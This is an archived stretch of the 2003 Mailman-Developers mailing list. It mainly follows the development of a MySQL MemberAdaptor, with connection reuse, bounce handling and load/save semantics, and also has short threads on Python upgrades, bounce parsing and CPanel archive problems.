Kev, > > I had a look at the patch and have some questions here: why you > > establish a connection to MySQL and then close it in each > > function? AFAIK this will put much presure on MySQL if there > > are some people to subscribe/unscribe from the list. Why not > > just establish a ststic link to MySQL and then use it every time > > you need to access the DB? > > > > Cain > > In response to this, and the atrocious performance that I just > observed sending to a 60,000 or so member list, I've implemented a > connection sharing system in v1.27. > > I've removed all the explicit connect/cursor calls, and now they're > implemented by a connect on __init() and subsequently by a single > function; prodServerConnection() which does a ping() against the > server(which the MySQL docs say should do an automatic reconnect if > possible), checks for errors, if the ping() fails, tries a full > disconnect and reconnect, trapping any errors that occur. > > If that fails, it drops out. > > This hasn't been thoroughly tested yet, but it should work I think. > > I still need a little help with the bounce_info and delivery_status > flags, though, as they don't seem to be working, in spite of what > Mailman is logging(*), the database isn't being updated. > > K. > > *) Lots of these, but the database isn't being updated properly... > > Nov 07 17:25:14 2003 (6195) XYZ@MYDOMAIN.co.uk: test current bounce > score: 1.0 > > -- > Kev Green, aka Kyrian. "Be excellent to each other" -- Bill & > Ted. > Email: kyrian@ore.org Web: http://kyrian.ore.org/ > ISP/Perl/PHP/Linux/Security Contractor, via http://www.orenet.co.uk/ > > _______________________________________________ > Mailman-Developers mailing list > Mailman-Developers@python.org > http://mail.python.org/mailman/listinfo/mailman-developers -- Kev Green, aka Kyrian. "Be excellent to each other" -- Bill & Ted. Email: kyrian@ore.org Web: http://kyrian.ore.org/ ISP/Perl/PHP/Linux/Security Contractor, via http://www.orenet.co.uk/ From kyrian-list at ore.org Sat Nov 8 08:56:31 2003 From: kyrian-list at ore.org (Kyrian (List)) Date: Sat Nov 8 08:56:50 2003 Subject: [Mailman-Developers] Mysql MemberAdaptor, v1.38 In-Reply-To: <37FBBA5F3A361C41AB7CE44558C3448E01167B7B@pdsmsx403.ccr.corp.intel.com> References: <37FBBA5F3A361C41AB7CE44558C3448E01167B7B@pdsmsx403.ccr.corp.intel.com> Message-ID: <20031108135631.61c62164.kyrian-list@ore.org> All, Changes: * AFAIK (having looked around a bit), the __del__() method should achieve this disconnect, etc. at the right time under python, and I've implemented one, which closes the relevant DB connections, but I don't know if it's ever called by the rest of Mailman... grepping the source doesn't seem to indicate that it is... * Added in some verbosity options to the module, not much as yet, but they're a start. * Moved stuff around to using syslog() rather than print() which seems to be the "Mailman way". * Documentation updates. At this point, notwithstanding the fact that the bounce and delivery status stuff isn't working (which I will need help to sort out, and it doesn't seem to be forthcoming), I think this thing is now "finished". K. PS. I'll shortly be heavily testing v1.38, but it's as yet only been slightly tested. On Sat, 8 Nov 2003 04:29:20 +0800 "Yuan, Cain" wrote: > Hi Kev, > It's very cool to do a ping() before using those connections. > One more question here: where are you planning to add the code > for close those connections when mailman is ready to quit > (sometimes we need to shutdown mailman manually and of cause we > did not want to leave those connection in the system)? Python > has a __init() but seems no __exit functions( correct me if I > am wrong). > > Regards, > > Cain > > > -----Original Message----- > From: mailman-developers-bounces+cain.yuan=intel.com@python.org > [mailto:mailman-developers-bounces+cain.yuan=intel.com@python.org]On > Behalf Of Kyrian (List) Sent: Saturday, November 08, 2003 1:40 AM > To: mailman-developers@python.org > Subject: [Mailman-Developers] Mysql MemberAdaptor, v1.27 > > > > > Hi Kev, > > I had a look at the patch and have some questions here: why you > > establish a connection to MySQL and then close it in each > > function? AFAIK this will put much presure on MySQL if there > > are some people to subscribe/unscribe from the list. Why not > > just establish a ststic link to MySQL and then use it every time > > you need to access the DB? > > > > Cain > > In response to this, and the atrocious performance that I just > observed sending to a 60,000 or so member list, I've implemented a > connection sharing system in v1.27. > > I've removed all the explicit connect/cursor calls, and now they're > implemented by a connect on __init() and subsequently by a single > function; prodServerConnection() which does a ping() against the > server(which the MySQL docs say should do an automatic reconnect if > possible), checks for errors, if the ping() fails, tries a full > disconnect and reconnect, trapping any errors that occur. > > If that fails, it drops out. > > This hasn't been thoroughly tested yet, but it should work I think. > > I still need a little help with the bounce_info and delivery_status > flags, though, as they don't seem to be working, in spite of what > Mailman is logging(*), the database isn't being updated. > > K. > > *) Lots of these, but the database isn't being updated properly... > > Nov 07 17:25:14 2003 (6195) XYZ@MYDOMAIN.co.uk: test current bounce > score: 1.0 > > -- > Kev Green, aka Kyrian. "Be excellent to each other" -- Bill & > Ted. > Email: kyrian@ore.org Web: http://kyrian.ore.org/ > ISP/Perl/PHP/Linux/Security Contractor, via http://www.orenet.co.uk/ > > _______________________________________________ > Mailman-Developers mailing list > Mailman-Developers@python.org > http://mail.python.org/mailman/listinfo/mailman-developers -- Kev Green, aka Kyrian. "Be excellent to each other" -- Bill & Ted. Email: kyrian@ore.org Web: http://kyrian.ore.org/ ISP/Perl/PHP/Linux/Security Contractor, via http://www.orenet.co.uk/ From ricardo at rixhq.nu Sun Nov 9 10:10:15 2003 From: ricardo at rixhq.nu (Ricardo Kustner) Date: Sun Nov 9 10:10:21 2003 Subject: [Mailman-Developers] digest & personalization Message-ID: <3FAE58D7.6070108@rixhq.nu> Hi, I'm going to need digest personalization to be able to properly handle those wonderful AOL Client Spam reports for my digest members. The FAQ says "digest deliveries can't be personalized currently". Has this been in the works yet? will it need really big changes in the code? I haven't been following mailman development lately but I might be able to work on this if it's not too complicated :) Ricardo. From davidb at chelsea.net Sun Nov 9 21:43:20 2003 From: davidb at chelsea.net (David Birnbaum) Date: Sun Nov 9 21:43:24 2003 Subject: [Mailman-Developers] HTML/plain text lists In-Reply-To: <3FAE58D7.6070108@rixhq.nu> References: <3FAE58D7.6070108@rixhq.nu> Message-ID: Folks, I have a rather large list (broadcast-style) that is currently going out in plain-text. We have a request from on-high to start sending out email in HTML format, but allow people to select which format to get it in. I see the nifty content filtering section. I was wondering, though, if it's on the horizon (or even the design sphere) to allow: 1. People to specify which type (HTML v. plain text) of message (not digest) they want; 2. Write code to allow Mailman to take messages to the list that contain both parts to send only the part that the user wants. Since this is not an open-collaboration list like this one, but rather a one-way broadcast, email sent to the list for forwarding would always have the "right" formatting to go out. I realize that there are ways to work around this (eg, two lists, one for each type), but it would be neat to have it work in one piece. Cheers, David. From PieterB at gewis.nl Mon Nov 10 04:14:21 2003 From: PieterB at gewis.nl (PieterB) Date: Mon Nov 10 04:14:27 2003 Subject: [Mailman-Developers] python 2.2.3 -> python 2.3.2 upgrade and mailman 2.1.2 Message-ID: <20031110091421.GA91161@gewis.win.tue.nl> Hi, I upgraded my Python from 2.2.3 to Python 2.3.2. Now Mailman's Qrunner sometimes gives the following error(s): python in free(): warning: page is already free python in free(): warning: page is already free Should I recompile/install/upgrade mailman when upgrading the python version? Are there any issues in upgrading mailman 2.1.2 -> mailman 2.1.3 (UPGRADING file doesn't say so). Are there any known problems with mailman 2.1.3 and python 2.3.x INSTALL-file mentions: "Currently Python 2.1.3 or Python 2.2.1 is recommended" Maybe it's good to mention the Python dependencies and preferred version on http://www.list.org/download.html Regards, Pieter BTW: I noticed The GNU site doesn't have the latest mailman available. -- http://zwiki.org/PieterB From kyrian-list at ore.org Mon Nov 10 06:17:49 2003 From: kyrian-list at ore.org (Kyrian (List)) Date: Mon Nov 10 06:17:56 2003 Subject: [Mailman-Developers] Mysql MemberAdaptor, v1.47. Bounce handling fixed? Message-ID: <20031110111749.64ce33ba.kyrian-list@ore.org> All, Right. The bounce info lastnotice and date are tuple variables of (year, month, day). I've now got the MySQL adaptor returning those after a little bit of hackery, which seems to correctly trigger the rest of the bounce code in Bouncer.py, as expected. So, I think it's all working now. I won't be able to tell for certain until tomorrow, unless I change the system clock on my workstation (obviously I'm not going to do that, because it'll naff everything else up), because of these things: Nov 10 11:06:48 2003 (2101) test: XXXX@YYY.co.ZZZ already scored a bounce for today But the mere fact that they are coming up, I think is enough to say I've got it right. Appropriate version has duly been uploaded to: http://kyrian.ore.org/MailmanMysql/ Enjoy. K. -- Kev Green, aka Kyrian. E: kyrian@ore.org WWW: http://kyrian.ore.org/ ISP/Perl/PHP/Linux/Security Contractor, via http://www.orenet.co.uk/ "Love is that condition in which the happiness of another person is essential to your own." R. Heinlein, Stranger in a Strange Land, 1961. From Dale at Newfield.org Mon Nov 10 07:14:27 2003 From: Dale at Newfield.org (Dale Newfield) Date: Mon Nov 10 07:14:30 2003 Subject: [Mailman-Developers] Mysql MemberAdaptor Load/Save/Lock/Unlock In-Reply-To: <20031110111749.64ce33ba.kyrian-list@ore.org> References: <20031110111749.64ce33ba.kyrian-list@ore.org> Message-ID: I don't think I understand how you reconcile Mailman's load/save transaction units with sql's transaction. There are places in mailman where a list is loaded and manipulated, but not saved... ...does your code basically change the semantics so that effectively a "save" happens after every single state change, yet the "save" method is a no-op? --- Dale Newfield "They that can give up essential liberty to obtain a little safety deserve neither liberty nor safety." - Benjamin Franklin, on the Statue of Liberty From kyrian-list at ore.org Mon Nov 10 08:31:17 2003 From: kyrian-list at ore.org (Kyrian (List)) Date: Mon Nov 10 08:31:25 2003 Subject: [Mailman-Developers] Re: Mysql MemberAdaptor Load/Save/Lock/Unlock In-Reply-To: References: <20031110111749.64ce33ba.kyrian-list@ore.org> Message-ID: <20031110133117.7e41c29f.kyrian-list@ore.org> Dale, et al, > I don't think I understand how you reconcile Mailman's load/save > transaction units with sql's transaction. > > There are places in mailman where a list is loaded and manipulated, > but not saved... > > ...does your code basically change the semantics so that effectively a > "save" happens after every single state change, yet the "save" method > is a no-op? > All I've done is implemented the Mailman 2.1 MemberAdaptor API as-is against a MySQL (which, incidently doesn't support transactions by default, unless they've started making InnoDB tables the default type) backend, without changing the semantics of anything(AFAIK), the only changes of any import that I've made are that the Member data structures are stored in a way that fits MySQL and converted as they are loaded to the way that fits Mailman, which you'd expect... It saves when a save method is called, loads when a load method is called, but that API doesn't include a lock and unlock method, so I've not implemented one (although I've left calls to 'self.__mlist.Locked()' in the code where they're appropriate, ie. where they are in OldStyleMemberships.py too). If there are changes being made to the data internally to the rest of Mailman that don't make calls to the MemberAdaptor API, then they are unaffected by my additions, and consequently they won't be having any effect on the MySQL database. However, having thought about it, you're probably talking about changes to the base structure of the list (name, footer, header, all that stuff), which isn't covered by the MemberAdaptor API, and hence I've not touched on. If an API for that purpose were provided (which AFAIK is pending, but not there yet, except maybe in CVS?), then I'd write the code for a MySQL backend, but I don't think I could, or should play about with the internals of Mailman beyond that. I just don't understand either Python or Mailman enough at that sort of level to do so, and I certainly don't want to introduce any obscure and nasty bugs into the core code... Please do correct me if I'm wrong on any of this? K. -- Kev Green, aka Kyrian. "Be excellent to each other" -- Bill & Ted. Email: kyrian@ore.org Web: http://kyrian.ore.org/ ISP/Perl/PHP/Linux/Security Contractor, via http://www.orenet.co.uk/ From barry at python.org Mon Nov 10 09:26:23 2003 From: barry at python.org (Barry Warsaw) Date: Mon Nov 10 09:26:30 2003 Subject: [Mailman-Developers] python 2.2.3 -> python 2.3.2 upgrade and mailman 2.1.2 In-Reply-To: <20031110091421.GA91161@gewis.win.tue.nl> References: <20031110091421.GA91161@gewis.win.tue.nl> Message-ID: <1068474382.15995.249.camel@anthem> On Mon, 2003-11-10 at 04:14, PieterB wrote: > I upgraded my Python from 2.2.3 to Python 2.3.2. Now Mailman's > Qrunner sometimes gives the following error(s): > > python in free(): warning: page is already free > python in free(): warning: page is already free > > Should I recompile/install/upgrade mailman when upgrading the python > version? Are there any issues in upgrading mailman 2.1.2 -> mailman > 2.1.3 (UPGRADING file doesn't say so). You shouldn't have to recompile Mailman when upgrading Python, unless your Python 2.3 lives in a different place. E.g. say you were using Python 2.2.3 in /usr/local/bin/python and you installed Python 2.3 as an altinstall in /usr/local/bin/python2.3. You want to make sure that the path to Python specified in things like your crontab match the Python that you're using on the command line. OTOH, we don't have any C extensions (I haven't checked the Asian codecs), so upgrading Python should be pain free. It was for me when I upgraded from 2.2.3 to 2.3.2. > Are there any known problems with mailman 2.1.3 and python 2.3.x > INSTALL-file mentions: "Currently Python 2.1.3 or Python 2.2.1 is > recommended" Updated. > Maybe it's good to mention the Python dependencies and preferred > version on http://www.list.org/download.html Added, and it'll show up on the websites next time I push out the pages. > Pieter > BTW: I noticed The GNU site doesn't have the latest mailman available. Hmm, I definitely sent them information about install it. Maybe you can drop their webmaster a note about it? -Barry From barry at python.org Mon Nov 10 11:36:38 2003 From: barry at python.org (Barry Warsaw) Date: Mon Nov 10 11:36:44 2003 Subject: [Mailman-Developers] More on Mysql MemberAdaptor? In-Reply-To: <20031105111140.51f91153.kyrian-list@ore.org> References: <37FBBA5F3A361C41AB7CE44558C3448E01167B73@pdsmsx403.ccr.corp.intel.com> <20031105111140.51f91153.kyrian-list@ore.org> Message-ID: <1068482197.15995.270.camel@anthem> I'm trying to catch up on this thread, so apologies if these questions are already answered... On Wed, 2003-11-05 at 06:11, Kyrian wrote: > But seriously, doing it that way means I don't really have to worry > about connection timeouts, etc. Maybe it can be rewritten later to work > differently (like when I learn to write better python ;*), but for the > most part, it will work now. I have cut down the number of connect() > calls a little already though, but not as far as perhaps I could go. I've been using the MySQLdb wrapper for Python recently in a different project and here's how I've dealt with connection timeouts. I have a "doquery" method which essentially calls connection.query() with the SQL statement. Wrap that call in try/except for MySQLdb.OperationalError, catch the exception object and test the error code against MySQLdb.constants.CR.SERVER_LOST. If they match, just chuck and re-open the connection. If they don't, just re-raise the exception. Untested code example: from MySQLdb import OperationalError from MySQLdb.constants.CR import SERVER_LOST def _doquery(self, sqlcmd): try: self._conn.query(sqlcmd) except OperationalError, e: code, msg = e if code <> SERVER_LOST: raise self._open() > for member bounceybouncey@orenet.co.uk > current score: 1.0 > last bounce date: (2003, 11, 4) > email notices left: 3 > last notice date: (1970, 1, 2) > confirmation cookie: a9e8f042d93d3777da981f353f2e00ade42f6f > > I'm putting the "info" parameter from setBounceInfo directly into the > database, which I think is an array itself, not a single value, and the > above doesn't look like Python's just traversing an array, and dumping > it into the database(the LHS names don't tie up with what I think are > the keys for the subelements of "info"), so it looks like I'll have to > take a "best guess" at how to implement this. My suggestion would be to pickle the BounceInfo object on the way into the database, and unpickle it on the way out. -Barry From barry at python.org Mon Nov 10 11:40:14 2003 From: barry at python.org (Barry Warsaw) Date: Mon Nov 10 11:40:18 2003 Subject: [Mailman-Developers] Mysql MemberAdaptor, v1.27 In-Reply-To: <37FBBA5F3A361C41AB7CE44558C3448E01167B7B@pdsmsx403.ccr.corp.intel.com> References: <37FBBA5F3A361C41AB7CE44558C3448E01167B7B@pdsmsx403.ccr.corp.intel.com> Message-ID: <1068482413.15995.273.camel@anthem> On Fri, 2003-11-07 at 15:29, Yuan, Cain wrote: > Hi Kev, > It's very cool to do a ping() before using those connections. One > more question here: where are you planning to add the code for close > those connections when mailman is ready to quit (sometimes we need to > shutdown mailman manually and of cause we did not want to leave those > connection in the system)? Python has a __init() but seems no __exit > functions( correct me if I am wrong). Mailman's MailList instance currently doesn't have a close() method. The best you can do is structure things around the pseudo-transactions of .Load() and .Save(). Not ideal, clearly. You could experiment with adding an __del__ to MailList. -Barry From barry at python.org Mon Nov 10 11:43:11 2003 From: barry at python.org (Barry Warsaw) Date: Mon Nov 10 11:43:16 2003 Subject: [Mailman-Developers] Mysql MemberAdaptor, v1.38 In-Reply-To: <20031108135631.61c62164.kyrian-list@ore.org> References: <37FBBA5F3A361C41AB7CE44558C3448E01167B7B@pdsmsx403.ccr.corp.intel.com> <20031108135631.61c62164.kyrian-list@ore.org> Message-ID: <1068482591.15995.277.camel@anthem> On Sat, 2003-11-08 at 08:56, Kyrian wrote: > * AFAIK (having looked around a bit), the __del__() method should > achieve this disconnect, etc. at the right time under python, and I've > implemented one, which closes the relevant DB connections, but I don't > know if it's ever called by the rest of Mailman... grepping the source > doesn't seem to indicate that it is... __del__() is always called implicitly by Python when an object is destroyed, either by way of its refcount falling to zero or garbage collection deleting it. In general, it's not a reliable way to free external resources because you really don't know when Python will call it, but in this case it might work okay (and may be the only option without some hacking. ;). -Barry From barry at python.org Mon Nov 10 11:47:35 2003 From: barry at python.org (Barry Warsaw) Date: Mon Nov 10 11:47:40 2003 Subject: [Mailman-Developers] Mysql MemberAdaptor Load/Save/Lock/Unlock In-Reply-To: References: <20031110111749.64ce33ba.kyrian-list@ore.org> Message-ID: <1068482855.15995.282.camel@anthem> On Mon, 2003-11-10 at 07:14, Dale Newfield wrote: > I don't think I understand how you reconcile Mailman's load/save > transaction units with sql's transaction. > > There are places in mailman where a list is loaded and manipulated, but > not saved... That's not supposed to happen. Yes, the list will be loaded and attributes read, but not saving the list after mutations would simply throw the changes away, which isn't good. That'd happen with the existing OldStyleMemberAdaptor just the same. Mailman's CGI interface are wrapped in a common pattern such as: - lock (or load) mlist - try - do some stuff - save - finally - unlock The runners have a similar pattern. The lock/load is equivalent to a transaction begin, the save is equivalent to a transaction commit, and the unlock is equivalent to a transaction abort -- assuming that an abort after a commit is safe for the underlying database (as it is e.g. for ZODB). Thus, if an exception occurs in the try block, you'll never get to the save and the current set of changes will simply be aborted at the unlock call. Mailman 3 will make all this much more explicit. -Barry From barry at python.org Mon Nov 10 11:54:19 2003 From: barry at python.org (Barry Warsaw) Date: Mon Nov 10 11:54:24 2003 Subject: [Mailman-Developers] Re: Mysql MemberAdaptor Load/Save/Lock/Unlock In-Reply-To: <20031110133117.7e41c29f.kyrian-list@ore.org> References: <20031110111749.64ce33ba.kyrian-list@ore.org> <20031110133117.7e41c29f.kyrian-list@ore.org> Message-ID: <1068483258.15995.284.camel@anthem> On Mon, 2003-11-10 at 08:31, Kyrian wrote: > If an API for that purpose were provided (which AFAIK is pending, but > not there yet, except maybe in CVS?) Nope, and there won't be one until Mailman 3. More on that soon . -Barry From kyrian-list at ore.org Mon Nov 10 12:22:23 2003 From: kyrian-list at ore.org (Kyrian (List)) Date: Mon Nov 10 12:22:38 2003 Subject: [Mailman-Developers] More on Mysql MemberAdaptor? In-Reply-To: <1068482197.15995.270.camel@anthem> References: <37FBBA5F3A361C41AB7CE44558C3448E01167B73@pdsmsx403.ccr.corp.intel.com> <20031105111140.51f91153.kyrian-list@ore.org> <1068482197.15995.270.camel@anthem> Message-ID: <20031110172223.47dfa0f4.kyrian-list@ore.org> (Moved just onto the developers list, in case people are getting annoyed with the duplicate messages, and on the assumption we're all on it) On Mon, 10 Nov 2003 11:36:38 -0500 Barry Warsaw wrote: > I'm trying to catch up on this thread, so apologies if these questions > are already answered... np. Had me worried there for a while though. > Untested code example: > > from MySQLdb import OperationalError > from MySQLdb.constants.CR import SERVER_LOST > > def _doquery(self, sqlcmd): > try: > self._conn.query(sqlcmd) > except OperationalError, e: > code, msg = e > if code <> SERVER_LOST: raise > self._open() > Heh. Excceptions make me nervous. FWIW. I think the ping() based implementation is probably the best one to go for, because it doesn't raise any exceptions (so say the MySQL[db] docs, anyway), and it automagically reconnects internally to MySQL's own code if it can. No point in making work for ourselves, eh? ;-) Although, importing the MySQLdb errorcodes is a good idea, and perhaps I'll make use of them in a future version. All of which reminds me, must document the fact that if you change the MySQL connection details, (I think) you need to restart Mailman. Anyways, thanks for the responses. If you're not totally appauled by the code quality, and you think it'll work, let me know, and (if necessary) I'll upload it to the sourceforge site patches section, from which you may apply a GPL license to it (as far as I'm concerned, and I think it's safe from the perspective of the related software, etc.), and do what you wish with it, as long as it's appropriately credited, and, for preference continues to include a link to http://www.orenet.co.uk/ in it. K. -- Kev Green, aka Kyrian. "Be excellent to each other" -- Bill & Ted. Email: kyrian@ore.org Web: http://kyrian.ore.org/ ISP/Perl/PHP/Linux/Security Contractor, via http://www.orenet.co.uk/ From barry at python.org Mon Nov 10 12:52:50 2003 From: barry at python.org (Barry Warsaw) Date: Mon Nov 10 12:53:02 2003 Subject: [Mailman-Developers] More on Mysql MemberAdaptor? In-Reply-To: <20031110172223.47dfa0f4.kyrian-list@ore.org> References: <37FBBA5F3A361C41AB7CE44558C3448E01167B73@pdsmsx403.ccr.corp.intel.com> <20031105111140.51f91153.kyrian-list@ore.org> <1068482197.15995.270.camel@anthem> <20031110172223.47dfa0f4.kyrian-list@ore.org> Message-ID: <1068486769.15995.296.camel@anthem> On Mon, 2003-11-10 at 12:22, Kyrian wrote: > Excceptions make me nervous. Exceptions are your friend! They're so warm and cuddly they shouldn't frighten anyone. :) > FWIW. I think the ping() based implementation is probably the best one > to go for, because it doesn't raise any exceptions (so say the MySQL[db] > docs, anyway), and it automagically reconnects internally to MySQL's own > code if it can. No point in making work for ourselves, eh? ;-) It all depends. Catching the exception might actually be less work because you're assuming that most of the time the connection is good, so you don't need the extra ping. You only need it when the connection is timed out. > If you're not totally appauled by the code quality, and you think it'll > work, let me know, and (if necessary) I'll upload it to the sourceforge > site patches section, from which you may apply a GPL license to it (as > far as I'm concerned, and I think it's safe from the perspective of the > related software, etc.), and do what you wish with it, as long as it's > appropriately credited, and, for preference continues to include a link > to http://www.orenet.co.uk/ in it. Cool, thanks. Do upload it. If we decide to use it, we'll probably need some kind of more formal disclaimer. In the meantime, it's a useful place for others to find it. -Barry From kyrian-list at ore.org Mon Nov 10 14:10:54 2003 From: kyrian-list at ore.org (Kyrian (List)) Date: Mon Nov 10 14:11:06 2003 Subject: [Mailman-Developers] More on Mysql MemberAdaptor? In-Reply-To: <1068486769.15995.296.camel@anthem> References: <37FBBA5F3A361C41AB7CE44558C3448E01167B73@pdsmsx403.ccr.corp.intel.com> <20031105111140.51f91153.kyrian-list@ore.org> <1068482197.15995.270.camel@anthem> <20031110172223.47dfa0f4.kyrian-list@ore.org> <1068486769.15995.296.camel@anthem> Message-ID: <20031110191054.73d3a95b.kyrian-list@ore.org> > > Excceptions make me nervous. > > Exceptions are your friend! They're so warm and cuddly they shouldn't > frighten anyone. :) > > > FWIW. I think the ping() based implementation is probably the best > > one to go for, because it doesn't raise any exceptions (so say the > > MySQL[db] docs, anyway), and it automagically reconnects internally > > to MySQL's own code if it can. No point in making work for > > ourselves, eh? ;-) > > It all depends. Catching the exception might actually be less work > because you're assuming that most of the time the connection is good, > so you don't need the extra ping. You only need it when the > connection is timed out. > Swings and roundabouts I guess. ping() is a pretty low overhead call as I understand it, so there's not much in it. Without connection cacheing though, it takes three times longer to initialize a list and start mailing (that's for a 60,000 member list). > > If you're not totally appauled by the code quality, and you think > > it'll work, let me know, and (if necessary) I'll upload it to the > > sourceforge site patches section, from which you may apply a GPL > > license to it (as far as I'm concerned, and I think it's safe from > > the perspective of the related software, etc.), and do what you wish > > with it, as long as it's appropriately credited, and, for preference > > continues to include a link to http://www.orenet.co.uk/ in it. > > Cool, thanks. Do upload it. Done. It's in as "[ 839386 ] MySQL MemberAdaptor for Mailman 2.1". > If we decide to use it, we'll probably need some kind of more formal > disclaimer. Shouldn't be a problem, as long as I don't have to guarantee it'll work flawlessly ;-) IIRC the only code that I've used in anything approaching a direct cut+paste job came from Mailman's CVS anyway, so it should all be fine. > In the meantime, it's a useful place for others to find it. Indeed. K. -- Kev Green, aka Kyrian. E: kyrian@ore.org WWW: http://kyrian.ore.org/ ISP/Perl/PHP/Linux/Security Contractor, via http://www.orenet.co.uk/ "Love is that condition in which the happiness of another person is essential to your own." R. Heinlein, Stranger in a Strange Land, 1961. -- Kev Green, aka Kyrian. "Be excellent to each other" -- Bill & Ted. Email: kyrian@ore.org Web: http://kyrian.ore.org/ ISP/Perl/PHP/Linux/Security Contractor, via http://www.orenet.co.uk/ From maechler at stat.math.ethz.ch Tue Nov 11 04:52:07 2003 From: maechler at stat.math.ethz.ch (Martin Maechler) Date: Tue Nov 11 04:52:15 2003 Subject: [Mailman-Developers] Uncaught bounce notification .. Message-ID: <16304.45383.867489.358864@gargle.gargle.HOWL> We have upgraded to mailman 2.1.3 quite a while ago. I'm managing several dozen mailing lists one of which is very active (2100 subscribers; 45% daily digest, about 70 messages a day) and as you can imagine with so many subscribers (from all over the world) address bounces are not rare. My problem is that I get about 50 "Uncaught bounce notification"s per day, only few of which are spam/virus related. Is anyone working on improving the `` but either the bounce format was not recognized, or no member addresses could be extracted from it '' part? I do see many (like the following) very it seems very easy to do both (recognize bounce format and extract member address; in the attached example, gustavo@lscp.pqi.ep.usp.br is clearly subscribed to the mailing list "r-help"). Regards, Martin Maechler http://stat.ethz.ch/~maechler/ Seminar fuer Statistik, ETH-Zentrum LEO C16 Leonhardstr. 27 ETH (Federal Inst. Technology) 8092 Zurich SWITZERLAND phone: x-41-1-632-3408 fax: ...-1228 <>< -------------- next part -------------- An embedded message was scrubbed... From: mailman-bounces@stat.math.ethz.ch Subject: Uncaught bounce notification Date: Tue, 11 Nov 2003 09:42:43 +0100 Size: 8317 Url: http://mail.python.org/pipermail/mailman-developers/attachments/20031111/92562907/attachment.mht From claw at kanga.nu Tue Nov 11 09:05:45 2003 From: claw at kanga.nu (J C Lawrence) Date: Tue Nov 11 09:05:52 2003 Subject: [Mailman-Developers] Uncaught bounce notification .. In-Reply-To: Message from Martin Maechler of "Tue, 11 Nov 2003 10:52:07 +0100." <16304.45383.867489.358864@gargle.gargle.HOWL> References: <16304.45383.867489.358864@gargle.gargle.HOWL> Message-ID: <21715.1068559545@kanga.nu> On Tue, 11 Nov 2003 10:52:07 +0100 Martin Maechler wrote: > My problem is that I get about 50 "Uncaught bounce notification"s per > day, only few of which are spam/virus related. Turn on VERP for a few days. -- J C Lawrence ---------(*) Satan, oscillate my metallic sonatas. claw@kanga.nu He lived as a devil, eh? http://www.kanga.nu/~claw/ Evil is a name of a foeman, as I live. From Martin at Cleaver.org Tue Nov 11 13:23:44 2003 From: Martin at Cleaver.org (Martin@Cleaver.org) Date: Tue Nov 11 13:24:00 2003 Subject: [Mailman-Developers] RE: [Mailman-Users] Mailman & CPanel? Message-ID: Nick / Barry Can you please at least acknowledge whether this is a known problem? Many Thanks, Martin. -- Martin@Cleaver.org - +1 416 832 7759 Melbourne Business School FT 2004 MBA Exchange Participant to Rotman =-----Original Message----- =From: Martin@Cleaver.org [mailto:Martin@Cleaver.org] =Sent: Wednesday, 5 November 2003 8:40 AM =To: 'J. Nick Koston'; 'Barry Warsaw' =Cc: 'mailman-developers@python.org'; 'serafin@eryxma.com' =Subject: RE: [Mailman-Developers] RE: [Mailman-Users] Mailman & CPanel? = =Actually, that's not my main complaint. = =My main complaint is that the archives don't work with HTML postings =rendering the mailing list practically useless. = =Here's a typical mailing: http://cp1.myhostdns.org/pipermail/social- =announce-ft2004_mbssrc.com/2003-November/date.html = =Here's my postings to the cpanel site: = * http://forums.cpanel.net/showthread.php?s=&threadid=15928 = =And I am not alone: = * http://forums.cpanel.net/showthread.php?s=&threadid=13383 = =Can you please advise? = =Thanks, = Martin. = =-- =Martin@Cleaver.org - +1 416 832 7759 =Melbourne Business School FT 2004 MBA Exchange Participant to Rotman = = = = ==-----Original Message----- ==From: J. Nick Koston [mailto:nick@cpanel.net] ==Sent: Tuesday, 4 November 2003 10:51 AM ==To: Barry Warsaw ==Cc: Martin@Cleaver.org; mailman-developers@python.org ==Subject: Re: [Mailman-Developers] RE: [Mailman-Users] Mailman & CPanel? == == ==The only problem that I've seen so far that I haven't track ==down to user error is mailman telling someone that their post ==has been rejected even though they are subscribed to the list ==and allowed to post. I still haven't been able to track down ==this one yet, or verify it as legit. As soon as I do I will ==let you know. == ==Thanks ==/Nick == ==On Mon, 2003-11-03 at 23:38, Barry Warsaw wrote: ==> On Tue, 2003-10-21 at 12:05, Martin@Cleaver.org wrote: ==> ==> > I am particularly concerned about ==> > http://forums.cpanel.net/showthread.php?s=&threadid=15928 but from ==> > the mailman-users@python.org list there are definitely a ==whole host ==> > of issues that the mailman-developers would address if we had the ==> > correct communication in place. ==> ==> I had some contact from the CPanel folks a while back, and I've just ==> added a FAQwizard entry with the contact information they provided: ==> ==> http://www.python.org/cgi-bin/faqw-mm.py?req=all#6.11 ==> ==> Sounds like you've already contacted them at their forums. I can't ==> read that thread because it requires a login and I don't ==have the time ==> or desire to register with their site. ==> ==> As always I'm willing to work with the CPanel folks if they can ==> identify bugs in Mailman, but the initiative has to come from there ==> side. Without that, I'd have no idea where to even start. ==> ==> -Barry ==> ==> ==> ==> == From barry at python.org Tue Nov 11 14:21:07 2003 From: barry at python.org (Barry Warsaw) Date: Tue Nov 11 14:21:14 2003 Subject: [Mailman-Developers] RE: [Mailman-Users] Mailman & CPanel? In-Reply-To: References: Message-ID: <1068578466.31989.62.camel@anthem> On Tue, 2003-11-11 at 13:23, Martin@Cleaver.org wrote: > Nick / Barry > Can you please at least acknowledge whether this is a known problem? > Many Thanks, > Martin. > =My main complaint is that the archives don't work with HTML postings > =rendering the mailing list practically useless. > = > =Here's a typical mailing: http://cp1.myhostdns.org/pipermail/social- > =announce-ft2004_mbssrc.com/2003-November/date.html > = > =Here's my postings to the cpanel site: > = * http://forums.cpanel.net/showthread.php?s=&threadid=15928 > = > =And I am not alone: > = * http://forums.cpanel.net/showthread.php?s=&threadid=13383 I'm sorry I can't get into the cpanel forums. But I did look at that Pipermail message (you need to follow the link to the one page that's in that date index). If I follow the link to the GIF image, it shows up just fine. Please note that the rendering of messages such as multipart/alternative are depending on list settings that I can't see, such as which content types to pass or scrub. I also haven't seen the original message so I don't know how what was posted matches against the filter_mime_types and pass_mime_types settings in the Content Filter section. There are also some site-wide settings which describe how to archive things like HTML messages, although I don't think that's what's happening here (it looks more like some unintended content-types are getting scrubbed out). I can't see any bugs, but your list may not be configured the way you want it for the types of messages being posted to it. -Barry From sensley at afo.net Fri Nov 7 16:18:11 2003 From: sensley at afo.net (Steve Ensley) Date: Thu Nov 13 11:57:53 2003 Subject: [Mailman-Developers] RE: [Mailman-Announce] A book on Mailman? Opinions, please. In-Reply-To: Message-ID: We are dropping the use of Mailman ( not enough reporting and too slow). But if you write a book on list server software, you might evaluate different versions and explain how they differ in features and why a feature is important. It has taken us two years to learn all of that. A book would have beena nice aide. Thanks! Steve -----Original Message----- From: mailman-announce-bounces+sensley=afo.net@python.org 